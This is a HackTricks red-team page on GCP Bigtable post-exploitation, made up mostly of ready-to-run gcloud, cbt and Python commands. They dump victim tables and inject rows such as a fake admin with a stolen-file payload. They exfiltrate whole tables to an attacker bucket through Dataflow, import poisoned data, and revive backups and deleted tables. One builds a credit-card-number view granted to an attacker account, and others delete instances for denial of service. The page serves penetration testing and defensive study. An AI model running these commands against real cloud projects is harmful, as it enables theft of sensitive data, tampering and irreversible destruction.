GCP - Bigtable Post Exploitation

Tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Bigtable

For more information about Bigtable check:

GCP - Bigtable Enum

Tip

Install the cbt CLI once via the Cloud SDK so the commands below work locally:

Install cbt CLI
gcloud components install cbt

Read rows

Permissions: bigtable.tables.readRows

cbt ships with the Cloud SDK and talks to the admin/data APIs without needing any middleware. Point it at the compromised project/instance and dump rows straight from the table. Limit the scan if you only need a peek.

Read Bigtable entries
# Install cbt
gcloud components update
gcloud components install cbt

# Read entries with creds of gcloud
cbt -project=<victim-proj> -instance=<instance-id> read <table-id>

Write rows

Permissions: bigtable.tables.mutateRows, (you will need bigtable.tables.readRows to confirm the change).

Use the same tool to upsert arbitrary cells. This is the quickest way to backdoor configs, drop web shells, or plant poisoned dataset rows.

Inject malicious row
# Inject a new row
cbt -project=<victim-proj> -instance=<instance-id> set <table> <row-key> <family>:<column>=<value>

cbt -project=<victim-proj> -instance=<instance-id> set <table-id> user#1337 profile:name="Mallory" profile:role="admin" secrets:api_key=@/tmp/stealme.bin

# Verify the injected row
cbt -project=<victim-proj> -instance=<instance-id> read <table-id> rows=user#1337

cbt set accepts raw bytes via the @/path syntax, so you can push compiled payloads or serialized protobufs exactly as downstream services expect them.

Dump rows to your bucket

Permissions: dataflow.jobs.create, resourcemanager.projects.get, iam.serviceAccounts.actAs

It’s possible to exfiltrate the contents of an entire table to a bucket controlled by the attacker by launching a Dataflow job that streams rows into a GCS bucket you control.

Note

Note that you will need the permission iam.serviceAccounts.actAs over a some SA with enough permissions to perform the export (by default, if not aindicated otherwise, the default compute SA will be used).

Export Bigtable to GCS bucket
gcloud dataflow jobs run <job-name> \
  --gcs-location=gs://dataflow-templates-us-<REGION>/<VERSION>/Cloud_Bigtable_to_GCS_Json \
  --project=<PROJECT> \
  --region=<REGION> \
  --parameters=<PROJECT>,bigtableInstanceId=<INSTANCE_ID>,bigtableTableId=<TABLE_ID>,filenamePrefix=<PREFIX>,outputDirectory=gs://<BUCKET>/raw-json/ \
  --staging-location=gs://<BUCKET>/staging/

# Example
gcloud dataflow jobs run dump-bigtable3 \
  --gcs-location=gs://dataflow-templates-us-central1/latest/Cloud_Bigtable_to_GCS_Json \
  --project=gcp-labs-3uis1xlx \
  --region=us-central1 \
  --parameters=bigtableProjectId=gcp-labs-3uis1xlx,bigtableInstanceId=avesc-20251118172913,bigtableTableId=prod-orders,filenamePrefix=prefx,outputDirectory=gs://deleteme20u9843rhfioue/raw-json/ \
  --staging-location=gs://deleteme20u9843rhfioue/staging/

Note

Switch the template to Cloud_Bigtable_to_GCS_Parquet or Cloud_Bigtable_to_GCS_SequenceFile if you want Parquet/SequenceFile outputs instead of JSON. The permissions are the same; only the template path changes.

Import rows

Permissions: dataflow.jobs.create, resourcemanager.projects.get, iam.serviceAccounts.actAs

It’s possible to import the contents of an entire table from a bucket controlled by the attacker by launching a Dataflow job that streams rows into a GCS bucket you control. For this the attacker will first need to create a parquet file with the data to be imported with the expected schema. An attacker could first export the data in parquet format following the previous technique with the setting Cloud_Bigtable_to_GCS_Parquet and add new entries into the downloaded parquet file

Note

Note that you will need the permission iam.serviceAccounts.actAs over a some SA with enough permissions to perform the export (by default, if not aindicated otherwise, the default compute SA will be used).

Import from GCS bucket to Bigtable
gcloud dataflow jobs run import-bt-$(date +%s) \
  --region=<REGION> \
  --gcs-location=gs://dataflow-templates-<REGION>/<VERSION>>/GCS_Parquet_to_Cloud_Bigtable \
  --project=<PROJECT> \
  --parameters=bigtableProjectId=<PROJECT>,bigtableInstanceId=<INSTANCE-ID>,bigtableTableId=<TABLE-ID>,inputFilePattern=gs://<BUCKET>/import/bigtable_import.parquet \
  --staging-location=gs://<BUCKET>/staging/

# Example
gcloud dataflow jobs run import-bt-$(date +%s) \
  --region=us-central1 \
  --gcs-location=gs://dataflow-templates-us-central1/latest/GCS_Parquet_to_Cloud_Bigtable \
  --project=gcp-labs-3uis1xlx \
  --parameters=bigtableProjectId=gcp-labs-3uis1xlx,bigtableInstanceId=avesc-20251118172913,bigtableTableId=prod-orders,inputFilePattern=gs://deleteme20u9843rhfioue/import/parquet_prefx-00000-of-00001.parquet \
  --staging-location=gs://deleteme20u9843rhfioue/staging/

Restoring backups

Permissions: bigtable.backups.restore, bigtable.tables.create.

An attacker with these permissions can restore a bakcup into a new table under his control in order to be able to recover old sensitive data.

Restore Bigtable backup
gcloud bigtable backups list --instance=<INSTANCE_ID_SOURCE> \
  --cluster=<CLUSTER_ID_SOURCE>

gcloud bigtable instances tables restore \
    --source=projects/<PROJECT_ID_SOURCE>/instances/<INSTANCE_ID_SOURCE>/clusters/<CLUSTER_ID>/backups/<BACKUP_ID> \
    --async \
    --destination=<TABLE_ID_NEW> \
    --destination-instance=<INSTANCE_ID_DESTINATION> \
    --project=<PROJECT_ID_DESTINATION>

Undelete tables

Permissions: bigtable.tables.undelete

Bigtable supports soft-deletion with a grace period (typically 7 days by default). During this window, an attacker with the bigtable.tables.undelete permission can restore a recently deleted table and recover all its data, potentially accessing sensitive information that was thought to be destroyed.

This is particularly useful for:

  • Recovering data from tables deleted by defenders during incident response
  • Accessing historical data that was intentionally purged
  • Reversing accidental or malicious deletions to maintain persistence
Undelete Bigtable table
# List recently deleted tables (requires bigtable.tables.list)
gcloud bigtable instances tables list --instance=<instance-id> \
  --show-deleted

# Undelete a table within the retention period
gcloud bigtable instances tables undelete <table-id> \
  --instance=<instance-id>

Note

The undelete operation only works within the configured retention period (default 7 days). After this window expires, the table and its data are permanently deleted and cannot be recovered through this method.

Create Authorized Views

Permissions: bigtable.authorizedViews.create, bigtable.tables.readRows, bigtable.tables.mutateRows

Authorized views let you present a curated subset of the table. Instead of respecting least privilege, use them to publish exactly the sensitive column/row sets you care about and whitelist your own principal.

Warning

The thing is that to create an authorized view you also need to be able to read and mutate rows in the base table, therefore you are not obtaiing any extra permission, therefore this technique is mostly useless.

Create authorized view
cat <<'EOF' > /tmp/credit-cards.json
{
  "subsetView": {
    "rowPrefixes": ["acct#"],
    "familySubsets": {
      "pii": {
        "qualifiers": ["cc_number", "cc_cvv"]
      }
    }
  }
}
EOF

gcloud bigtable authorized-views create card-dump \
  --instance=<instance-id> --table=<table-id> \
  --definition-file=/tmp/credit-cards.json

gcloud bigtable authorized-views add-iam-policy-binding card-dump \
  --instance=<instance-id> --table=<table-id> \
  --member='user:<attacker@example.com>' --role='roles/bigtable.reader'

Because access is scoped to the view, defenders often overlook the fact that you just created a new high-sensitivity endpoint.

Read Authorized Views

Permissions: bigtable.authorizedViews.readRows

If you have access to an Authorized View, you can read data from it using the Bigtable client libraries by specifying the authorized view name in your read requests. Note that the authorized view will be probalby limiting what you can access from the table. Below is an example using Python:

Read from authorized view (Python)
from google.cloud import bigtable
from google.cloud.bigtable_v2 import BigtableClient as DataClient
from google.cloud.bigtable_v2 import ReadRowsRequest

# Set your project, instance, table, view id
PROJECT_ID = "gcp-labs-3uis1xlx"
INSTANCE_ID = "avesc-20251118172913"
TABLE_ID = "prod-orders"
AUTHORIZED_VIEW_ID = "auth_view"

client = bigtable.Client(project=PROJECT_ID, admin=True)
instance = client.instance(INSTANCE_ID)
table = instance.table(TABLE_ID)

data_client = DataClient()
authorized_view_name = f"projects/{PROJECT_ID}/instances/{INSTANCE_ID}/tables/{TABLE_ID}/authorizedViews/{AUTHORIZED_VIEW_ID}"

request = ReadRowsRequest(
    authorized_view_name=authorized_view_name
)

rows = data_client.read_rows(request=request)
for response in rows:
    for chunk in response.chunks:
        if chunk.row_key:
            row_key = chunk.row_key.decode('utf-8') if isinstance(chunk.row_key, bytes) else chunk.row_key
            print(f"Row: {row_key}")
        if chunk.family_name:
            family = chunk.family_name.value if hasattr(chunk.family_name, 'value') else chunk.family_name
            qualifier = chunk.qualifier.value.decode('utf-8') if hasattr(chunk.qualifier, 'value') else chunk.qualifier.decode('utf-8')
            value = chunk.value.decode('utf-8') if isinstance(chunk.value, bytes) else str(chunk.value)
            print(f"  {family}:{qualifier} = {value}")

Denial of Service via Delete Operations

Permissions: bigtable.appProfiles.delete, bigtable.authorizedViews.delete, bigtable.authorizedViews.deleteTagBinding, bigtable.backups.delete, bigtable.clusters.delete, bigtable.instances.delete, bigtable.tables.delete

Any of the Bigtable delete permissions can be weaponized for denial of service attacks. An attacker with these permissions can disrupt operations by deleting critical Bigtable resources:

  • bigtable.appProfiles.delete: Delete application profiles, breaking client connections and routing configurations
  • bigtable.authorizedViews.delete: Remove authorized views, cutting off legitimate access paths for applications
  • bigtable.authorizedViews.deleteTagBinding: Remove tag bindings from authorized views
  • bigtable.backups.delete: Destroy backup snapshots, eliminating disaster recovery options
  • bigtable.clusters.delete: Delete entire clusters, causing immediate data unavailability
  • bigtable.instances.delete: Remove complete Bigtable instances, wiping out all tables and configurations
  • bigtable.tables.delete: Delete individual tables, causing data loss and application failures
Delete Bigtable resources
# Delete a table
gcloud bigtable instances tables delete <table-id> \
  --instance=<instance-id>

# Delete an authorized view
gcloud bigtable authorized-views delete <view-id> \
  --instance=<instance-id> --table=<table-id>

# Delete a backup
gcloud bigtable backups delete <backup-id> \
  --instance=<instance-id> --cluster=<cluster-id>

# Delete an app profile
gcloud bigtable app-profiles delete <profile-id> \
  --instance=<instance-id>

# Delete a cluster
gcloud bigtable clusters delete <cluster-id> \
  --instance=<instance-id>

# Delete an entire instance
gcloud bigtable instances delete <instance-id>

Warning

Deletion operations are often immediate and irreversible. Ensure backups exist before testing these commands, as they can cause permanent data loss and severe service disruption.

Tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks